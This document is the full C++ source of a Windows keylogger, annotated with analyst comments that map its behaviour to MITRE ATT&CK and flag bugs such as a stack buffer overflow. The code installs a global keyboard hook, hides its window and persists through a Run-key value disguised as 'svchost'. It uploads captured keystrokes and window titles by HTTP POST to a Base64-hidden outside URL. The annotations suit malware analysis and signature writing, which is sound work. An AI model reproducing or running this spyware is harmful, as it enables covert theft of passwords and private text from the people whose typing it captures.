Creative Commons License Foxbond's Repo

/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
//#include <unistd.h>
#pragma comment(lib, "libcurl.lib") 
//#pragma comment(lib, "wldap32.lib") 
#pragma comment(lib, "ws2_32.lib") 
#pragma comment(lib, "winmm.lib") 
#pragma comment(lib, "ssleay32.lib")
//#pragma comment(lib, "openldap.lib") 
#pragma comment(lib, "libeay32.lib") 

#include <Strsafe.h>


#include "curl/curl.h"

#include "base64/base64.h"
//#include "base64/base64.cpp"

using namespace std;

// Collection endpoint for save_log(). The literal is Base64 and decodes to a plain "http://"
// URL, so the encoding only hides the address from a casual strings scan; it is not encryption.
// NOTE(review): the literal ends in "==" although the text before it is already a multiple of
// four characters; whether that is tolerated depends on base64_decode — confirm.
string url = base64_decode("aHR0cDovL2ZveGJvbmQubGludXhwbC5pbmZvL2tsL3Byb3RvdHlwZUhhbmRsZXIucGhw==");
// Static values sent as the "key", "version" and "id" form fields of every upload (see save_log).
// Being constant, they are usable as network signatures for this sample.
string key = "prototypeKey";
string version = "0.1";
string id = "0"; 

// Handle returned by SetWindowsHookEx(WH_KEYBOARD_LL) in WinMain; 0 until the hook is installed.
HHOOK hKeyboardHook = 0;
//HHOOK hClipboardHook = 0;// clipboard (disabled)
// In-memory capture buffer: window headers and key text accumulate here until save_log() uploads them.
string LogFile;
// Last foreground window seen by the hook, and its title text.
HWND hCurrentWindow;
char sWindowTitle[256];
// CR LF pair appended to the log as a line break.
// NOTE(review): the array has exactly two elements and no terminating NUL, yet it is appended
// with `LogFile += cReturn`, which treats it as a C string and reads past the array.
char cReturn[] = {13, 10};
// Scratch storage for the timestamp written in each window header.
SYSTEMTIME SystemTime;
char cTime[64];
// cFileName and error_count are not referenced anywhere else in the visible source.
char cFileName[64];
unsigned short error_count=0;
// Size of the buffer test_key() uses when reading the registry value.
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
// Upload threshold: once LogFile holds more than this many bytes the hook calls save_log().
unsigned int save_buffer_size = 102; //10240;

// Registry settings used by test_key()/create_key(): when modifyRegistry is true they operate
// on the Run key under registryTarget (the current user's hive).
bool modifyRegistry = true;
HKEY registryTarget = HKEY_CURRENT_USER;

bool test_key(void);
void create_key(void);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

/*  Window class name registered in WinMain, kept as a global variable  */
char szClassName[ ] = "WindowsApp";

void save_log (void);


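/**
 * Show the calling thread's last Win32 error in a message box, then terminate the process.
 *
 * @param lpszFunction  Name of the API call that failed; shown verbatim in the message.
 *
 * Does not return: it ends with ExitProcess(), using the error code as the exit status.
 */
void ErrorExit(LPTSTR lpszFunction) 
{ 
    // Capture the code first: the calls below may overwrite the thread's last-error value.
    const DWORD dw = GetLastError(); 

    // Start from NULL so a failed FormatMessage() leaves a testable value instead of an
    // uninitialised pointer that would later be passed to lstrlen() and LocalFree().
    LPTSTR lpMsgBuf = NULL;
    const DWORD cchMsg = FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | 
        FORMAT_MESSAGE_FROM_SYSTEM |
        FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,
        dw,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPTSTR) &lpMsgBuf,
        0, NULL );

    // Fall back to fixed text when the system has no message or the caller passed no name.
    LPCTSTR lpszDetail = (cchMsg != 0 && lpMsgBuf != NULL)
        ? (LPCTSTR)lpMsgBuf
        : TEXT("(no system message available)");
    LPCTSTR lpszName = (lpszFunction != NULL)
        ? (LPCTSTR)lpszFunction
        : TEXT("(unknown)");

    // 40 extra characters cover the fixed text and the decimal error code.
    const SIZE_T cchDisplay = (SIZE_T)lstrlen(lpszDetail) + (SIZE_T)lstrlen(lpszName) + 40;
    LPTSTR lpDisplayBuf = (LPTSTR)LocalAlloc(LMEM_ZEROINIT, cchDisplay * sizeof(TCHAR));

    if (lpDisplayBuf != NULL)
    {
        // DWORD is unsigned, so print it with %lu; %d showed large codes as negative numbers.
        StringCchPrintf(lpDisplayBuf, 
            cchDisplay,
            TEXT("%s failed with error %lu: %s"), 
            lpszName, dw, lpszDetail); 
        MessageBox(NULL, lpDisplayBuf, TEXT("Error"), MB_OK); 
        LocalFree(lpDisplayBuf);
    }
    else
    {
        // Allocation failed: still show the system text rather than dereferencing NULL.
        MessageBox(NULL, lpszDetail, TEXT("Error"), MB_OK); 
    }

    if (lpMsgBuf != NULL)
        LocalFree(lpMsgBuf);
    ExitProcess(dw); 
}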

/* schowek (clipboard) - disabled experimental code
LRESULT CALLBACK GetMsgProc( int nCode, WPARAM wParam, LPARAM lParam) {
	
	//MessageBox(0, "Wyk", 0, 0);
	
	if (nCode >= 0){
		LPMSG m=(LPMSG)lParam;
		MessageBox(0, (LPCSTR)(int)m->message, 0, 0);

		if(m->message == WM_PASTE) {
			MessageBox(0, "Pastee", 0, 0);
		}
	}

	return CallNextHookEx(hClipboardHook, nCode, wParam, lParam);
};
/*
std::string GetClipboardText()
{
  // Try opening the clipboard
	if (! OpenClipboard(nullptr)){ MessageBox(0, "err1", 0, 0); }

  // Get handle of clipboard object for ANSI text
  HANDLE hData = GetClipboardData(CF_TEXT);
  if (hData == nullptr){ MessageBox(0, "err2", 0, 0); }

  // Lock the handle to get the actual text pointer
  char * pszText = static_cast<char*>( GlobalLock(hData) );
  if (pszText == nullptr){ MessageBox(0, "err3", 0, 0); }

  // Save text in a string class instance
  std::string text( pszText );

  // Release the lock
  GlobalUnlock( hData );

  // Release the clipboard
  CloseClipboard();

  return text;
}
/* schowek */

/**
 * WH_KEYBOARD_LL hook callback: records key releases into the global LogFile string.
 *
 * Analyst summary (MITRE ATT&CK T1056.001, keylogging):
 *  - Acts only when nCode >= 0 and wParam == WM_KEYUP; every other event is just forwarded.
 *  - When the foreground window changes, a header holding the time from GetSystemTime()
 *    (which reports UTC) and the new window title is appended before the key text.
 *  - The virtual-key code is turned into text by the switch below; codes without a case
 *    are not logged.
 *  - Once LogFile is longer than save_buffer_size, save_log() is called from inside the
 *    callback, i.e. the upload runs synchronously on the hook path.
 *
 * The literal strings "[ Czas: " and " Nazwa okna: " (Polish for "Time" and "Window name")
 * are written to the log verbatim and make distinctive static strings for signatures.
 *
 * @param nCode   Hook code; the event is examined only when it is >= 0.
 * @param wParam  Keyboard message identifier.
 * @param lParam  Pointer to a KBDLLHOOKSTRUCT describing the key event.
 * @return        The result of CallNextHookEx(); the event is always passed on.
 */
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
	KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;

	if (nCode >= 0) {
		if (wParam == WM_KEYUP)
		{
			// Foreground window changed since the last logged key: write a context header.
			if(hCurrentWindow != GetForegroundWindow())
			{
				hCurrentWindow = GetForegroundWindow();
				GetWindowText(hCurrentWindow, sWindowTitle, 256);
				GetSystemTime(&SystemTime);
				// was sprintf_s
				sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
				// NOTE(review): cReturn is a two-byte array without a terminating NUL, so
				// appending it as a C string reads past the array; stray bytes may follow
				// the CR LF in captured logs.
				LogFile += cReturn;
				LogFile += cTime;
				LogFile += " Nazwa okna: ";
				LogFile += sWindowTitle;
				LogFile += " ]";
				LogFile += cReturn;
				/*
				LPDWORD lpdwProcessId = 0;1428
				DWORD procId;
				procId = GetWindowThreadProcessId(hCurrentWindow, lpdwProcessId);
				hClipboardHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, 0, procId);
				if(hClipboardHook == NULL) {
					//MessageBox(0, "bez hooka", 0, 0);
					ErrorExit("SetWindowsHookEx(WH_GETMESSAGE");
					
				}*/
		
			}



			// Translate the virtual-key code of the released key into log text.
			switch(pKbdLLHookStruct->vkCode)
			{
				// Named control keys are logged as bracketed tags.
				case VK_RETURN:
					LogFile += "[Enter]";
					LogFile += cReturn;

					break;
				case VK_BACK:
					LogFile += "[Backspace]";
					break;
				case VK_ESCAPE:
					LogFile += "[Escape]";
					break;
				case VK_CAPITAL:
					LogFile += "[Capslock]";
					break;
				case VK_LMENU:
					LogFile += "[LAlt]";
					break;
				case VK_RMENU:
					LogFile += "[RAlt]";
					break;
				case VK_MENU:
					LogFile += "[Alt]";
					break;
				case VK_CONTROL:
					LogFile += "[Ctrl]";
					break;
				case VK_DELETE:
					LogFile += "[Delete]";
					break;
				case VK_SPACE:
					LogFile += " ";
					break;
				// Numeric-keypad operator keys.
				case VK_MULTIPLY:
					LogFile += "*";
					break;
				case VK_ADD:
					LogFile += "+";
					break;
				case VK_SUBTRACT:
					LogFile += "-";
					break;
				case VK_DECIMAL:
					LogFile += ".";
					break;
				case VK_DIVIDE:
					LogFile += "/";
					break;
				// Numeric cases 186..192 and 219..222 are the VK_OEM_* punctuation keys; the
				// characters chosen match a US keyboard layout. "Shifted" is decided by a
				// bitwise OR of both GetAsyncKeyState() results, so any set bit in either
				// value counts. Caps Lock state is never consulted anywhere in this switch.
				case 188:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 192:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "~~";
					else
						LogFile += "`";
					break;
				case 222:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "\"";
					else
						LogFile += "'";
					break;
				case 220:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "|";
					else
						LogFile += "\\";
					break;
				case 219:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "{";
					else
						LogFile += "[";
					break;
				case 221:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "}";
					else
						LogFile += "]";
					break;
				case 186:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ":";
					else
						LogFile += ";";
					break;
				case 191:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "?";
					else
						LogFile += "/";
					break;
				case 190:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ">";
					else
						LogFile += ".";
					break;
				// NOTE(review): 44 is the ASCII code of ',' but as a virtual-key code it is
				// VK_SNAPSHOT (Print Screen), so this case presumably logs a comma for that key.
				case 44:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 187:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "+";
					else
						LogFile += "=";
					break;
				case 189:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "_";
					else
						LogFile += "-";
					break;
				// 65..90: letter keys A..Z. Case follows the Shift test only, so text typed
				// with Caps Lock on is logged in lower case.
				case 65:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "A";
					else
						LogFile += "a";
					break;
				case 66:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "B";
					else
						LogFile += "b";
					break;
				case 67:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "C";
					else
						LogFile += "c";
					break;
				case 68:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "D";
					else
						LogFile += "d";
					break;
				case 69:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "E";
					else
						LogFile += "e";
					break;
				case 70:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "F";
					else
						LogFile += "f";
					break;
				case 71:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "G";
					else
						LogFile += "g";
					break;
				case 72:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "H";
					else
						LogFile += "h";
					break;
				case 73:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "I";
					else
						LogFile += "i";
					break;
				case 74:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "J";
					else
						LogFile += "j";
					break;
				case 75:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "K";
					else
						LogFile += "k";
					break;
				case 76:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "L";
					else
						LogFile += "l";
					break;
				case 77:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "M";
					else
						LogFile += "m";
					break;
				case 78:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "N";
					else
						LogFile += "n";
					break;
				case 79:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "O";
					else
						LogFile += "o";
					break;
				case 80:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "P";
					else
						LogFile += "p";
					break;
				case 81:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Q";
					else
						LogFile += "q";
					break;
				case 82:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "R";
					else
						LogFile += "r";
					break;
				case 83:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "S";
					else
						LogFile += "s";
					break;
				case 84:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "T";
					else
						LogFile += "t";
					break;
				case 85:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "U";
					else
						LogFile += "u";
					break;
				case 86:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "V";
					else
						LogFile += "v";
					break;
				case 87:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "W";
					else
						LogFile += "w";
					break;
				case 88:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "X";
					else
						LogFile += "x";
					break;
				case 89:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Y";
					else
						LogFile += "y";
					break;
				case 90:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Z";
					else
						LogFile += "z";
					break;
				// Numeric-keypad digits are logged as plain digits, with no Shift handling.
				case VK_NUMPAD0:
					LogFile += "0";
					break;
				case VK_NUMPAD1:
					LogFile += "1";
					break;
				case VK_NUMPAD2:
					LogFile += "2";
					break;
				case VK_NUMPAD3:
					LogFile += "3";
					break;
				case VK_NUMPAD4:
					LogFile += "4";
					break;
				case VK_NUMPAD5:
					LogFile += "5";
					break;
				case VK_NUMPAD6:
					LogFile += "6";
					break;
				case VK_NUMPAD7:
					LogFile += "7";
					break;
				case VK_NUMPAD8:
					LogFile += "8";
					break;
				case VK_NUMPAD9:
					LogFile += "9";
					break;
				// 48..57: top-row digit keys; with Shift they log the US-layout symbols.
				case 48:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ")";
					else
						LogFile += "0";
					break;
				case 49:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "!";
					else
						LogFile += "1";
					break;
				case 50:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "@";
					else
						LogFile += "2";
					break;
				case 51:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "#";
					else
						LogFile += "3";
					break;
				case 52:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "$";
					else
						LogFile += "4";
					break;
				case 53:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "%";
					else
						LogFile += "5";
					break;
				case 54:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "^";
					else
						LogFile += "6";
					break;
				case 55:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "&";
					else
						LogFile += "7";
					break;
				case 56:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "*";
					else
						LogFile += "8";
					break;
				case 57:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "(";
					else
						LogFile += "9";
					break;
			}// end of switch (probably)

			// Buffer above the threshold (save_buffer_size): upload it now. The call is made
			// from inside the hook callback, so it completes before the event is forwarded.
			if ( LogFile.size() > save_buffer_size )
			{
                 save_log(); //cURL save

            }

		}
	}

	// Always hand the event to the next hook so typing is not visibly affected.
	return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}


/**
 * Program entry point: creates a hidden window, installs the global keyboard hook, writes
 * the autostart registry value and then pumps messages until WM_QUIT.
 *
 * Analyst summary of observable behaviour:
 *  - Registers window class "WindowsApp" and creates a 1x1 window titled "SYSTEM" that is
 *    immediately hidden with SW_HIDE, so the process has no visible UI.
 *  - Installs a WH_KEYBOARD_LL hook (LowLevelKeyboardProc) for the whole session.
 *  - Calls create_key() unconditionally; test_key() is not called in the visible source.
 *  - On exit, removes the hook and calls save_log() once more to upload what is buffered.
 *
 * @param hThisInstance  Instance handle used for the window class and the window.
 * @param hPrevInstance  Unused.
 * @param lpszArgument   Command line; unused.
 * @param nFunsterStil   Show command; unused (the window is always hidden).
 * @return 0 when the window class cannot be registered, otherwise EXIT_SUCCESS.
 */
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {

	/* clipboard (disabled experiment) */
	//MessageBox(0, GetClipboardText().c_str(), 0, 0);
	/*
	hClipboardHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, GetModuleHandle(0), 0);
	if(hClipboardHook == NULL) {
		MessageBox(0, "bez hooka", 0, 0);
		//ErrorExit("SetWindowsHookEx");
		
	}
	/* end of clipboard section */

    HWND hwnd;               /* This is the handle for our window */
    MSG messages;            /* Here messages to the application are saved */
    WNDCLASSEX wincl;        /* Data structure for the windowclass */

    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
    wincl.cbSize = sizeof (WNDCLASSEX);

    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;                 /* No menu */
    wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
    wincl.cbWndExtra = 0;                      /* structure or the window instance */
    /* Use Windows's default color as the background of the window */
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;

    /* Register the window class, and if it fails quit the program */
    if (!RegisterClassEx (&wincl)) {
        /* Polish message: "Failed to register the class! The program is exiting..." */
        MessageBox(0, "Nie udało się zarejestrować klasy! Program kończy działanie...", 0, 0);
        return 0;
    }

    /* The class is registered, let's create the program*/
    /* NOTE(review): the returned handle is not checked for NULL before ShowWindow(). */
    hwnd = CreateWindowEx (
           0,                   /* Extended possibilites for variation */
           szClassName,         /* Classname */
           "SYSTEM",       /* Title Text */
           WS_OVERLAPPEDWINDOW, /* default window */
           CW_USEDEFAULT,       /* Windows decides the position */
           CW_USEDEFAULT,       /* where the window ends up on the screen */
           1,                 /* The programs width */
           1,                 /* and height in pixels */
           HWND_DESKTOP,        /* The window is a child-window to desktop */
           NULL,                /* No menu */
           hThisInstance,       /* Program Instance handler */
           NULL                 /* No Window Creation data */
           );

    
    /* The window exists only to own a message loop; it is never shown to the user. */
    ShowWindow (hwnd, SW_HIDE);

	

    /* Install the session-wide low-level keyboard hook; abort with an error box on failure. */
    hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
	if(hKeyboardHook == NULL) {
		ErrorExit("SetWindowsHookEx(WH_KEYBOARD_LL)");
	}

	/* Write the Run-key autostart value (see create_key). */
	create_key();


    /* Run the message loop. It will run until GetMessage() returns 0 */
    while (GetMessage (&messages, NULL, 0, 0))
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage(&messages);
        /* Send message to WindowProcedure */
        DispatchMessage(&messages);
    }


    /* Polish message: "The UnhookWindowsHookEx function failed." */
    if(UnhookWindowsHookEx(hKeyboardHook) == 0)
		MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);

	/* Final upload of whatever is still buffered. */
	save_log();
	return EXIT_SUCCESS;
}


/*  This function is called by the Windows function DispatchMessage()  */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    /* Only WM_DESTROY is handled here; every other message gets the default processing. */
    if (message != WM_DESTROY)
        return DefWindowProc (hwnd, message, wParam, lParam);

    /* The window is going away: upload the buffered log, then post WM_QUIT so the
       message loop in WinMain ends. */
    save_log();
    PostQuitMessage (0);
    return 0;
}

// Receives libcurl's human-readable error text (registered via CURLOPT_ERRORBUFFER in
// save_log, which appends it to LogFile when an upload fails).
static char errorBuffer[CURL_ERROR_SIZE];

// Collects the HTTP response body through writer(). Nothing in the visible source reads or
// clears it, so it grows with every response.
static string buffer;

// libcurl write callback: appends each received chunk to the std::string supplied as user
// data. Returns the number of bytes stored, or 0 when no destination string was given.
static int writer(char *data, size_t size, size_t nmemb,
                  std::string *buffer)
{
  // No destination: store nothing and report zero bytes handled.
  if (!buffer)
    return 0;

  // libcurl delivers the chunk as nmemb items of `size` bytes each.
  const size_t chunkBytes = size * nmemb;
  buffer->append(data, chunkBytes);

  // The byte count is narrowed to int because that is the declared return type.
  return static_cast<int>(chunkBytes);
}

/**
 * Upload the buffered log to the collection URL with an HTTP POST via libcurl.
 *
 * Analyst summary (exfiltration path of this sample):
 *  - Request body is the form string "key=...&version=...&id=...&log=..." built from the
 *    globals key, version, id and LogFile. The values are inserted as-is, without URL
 *    encoding, so captured text appears literally in the body.
 *  - The target is the global `url`; no TLS-related options are set in this function.
 *  - On CURLE_OK the log is cleared. On failure the log is kept and libcurl's error text
 *    is appended to it, so the buffer keeps growing across failed attempts.
 *  - The response body is appended to the global `buffer` by writer().
 *
 * NOTE(review): method_post is a fixed 12240-byte stack array filled by an unbounded
 * sprintf(). Because a failed upload leaves LogFile in place and adds to it, the formatted
 * string can exceed the array after repeated failures (stack buffer overflow, CWE-121).
 */
void save_log (void)
{
     // upload via cURL
     CURL *curl;
     CURLcode result;
     //char* method_post="";
	 char method_post[12240];

     // Build the POST body; see the NOTE(review) above about the unbounded write.
     sprintf(method_post, "key=%s&version=%s&id=%s&log=%s", key.c_str(), version.c_str(), id.c_str(), LogFile.c_str() );
	 //MessageBox(0, method_post, 0, 0);
    curl = curl_easy_init();
    if (curl)
    {
      // Now set up all of the curl options

      curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
      curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
      //curl_easy_setopt(curl, CURLOPT_HEADER, 0);
      //curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
      curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
      curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
      curl_easy_setopt(curl, CURLOPT_POST, 1);
      curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);

      // Send the request; this call blocks until the transfer finishes or fails
      result = curl_easy_perform(curl);

      // Always cleanup
      curl_easy_cleanup(curl);


      // Did we succeed?
      if (result == CURLE_OK)  {
        //ok
        LogFile.clear(); // clear the log
      }
      else {
        //error: keep the captured text and record why the upload failed
        LogFile += "\n Save Error!!! \n";
        LogFile += errorBuffer;
        LogFile += "\n end error log \n";
      }

    }
    else {
        //curl object error
        LogFile += "\n cURL init error!!! \n";
    }


}

/**
 * Report whether the autostart value used by this program can be read.
 *
 * Opens SOFTWARE\Microsoft\Windows\CurrentVersion\Run under registryTarget and queries the
 * value named "svchost". Not called anywhere in the visible source.
 *
 * @return true when the value was read, or when modifyRegistry is false (the check is then
 *         skipped entirely); false when the key cannot be opened or the query fails.
 */
bool test_key(void) {

	if (modifyRegistry){
		// Receives the value data; the content itself is never inspected.
		char path[BUFSIZE];
		DWORD buf_length=BUFSIZE;
		HKEY hKey;

		int regKey=RegOpenKeyEx(registryTarget,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
		
		// Non-zero means the Run key could not be opened for reading.
		if(regKey!=0){
			return false;
		}

		// A value longer than BUFSIZE bytes also makes this query fail, which is then
		// reported the same way as a missing value.
		regKey=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
		RegCloseKey(hKey);

		if (regKey !=0){
			return false;
		}

	}

	return true;
}

/**
 * Write the autostart value for this program; does nothing when modifyRegistry is false.
 *
 * Analyst summary (MITRE ATT&CK T1547.001, Run-key persistence; T1036.005, masquerading):
 *  - Key:   SOFTWARE\Microsoft\Windows\CurrentVersion\Run under registryTarget
 *           (HKEY_CURRENT_USER by default in this file).
 *  - Value: "svchost", type REG_SZ, data "%windir%\svchost.exe".
 *  The genuine Windows svchost.exe resides in the System32 directory, so a Run value named
 *  "svchost" that points at the Windows root directory is a useful hunting indicator.
 *  The visible source does not show how a file would be placed at that path.
 *
 * Neither registry call's return code is checked, and hkey is not closed here.
 */
void create_key(void) {

	if (modifyRegistry){
		string key_path =  "%windir%\\svchost.exe";
		char *path = (char*)key_path.c_str();
		HKEY hkey;

		// Opens the Run key, creating it if it does not exist.
		int regKey=RegCreateKey(registryTarget,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);

		// Stores the path string under the value name "svchost".
		RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
		
	}

}
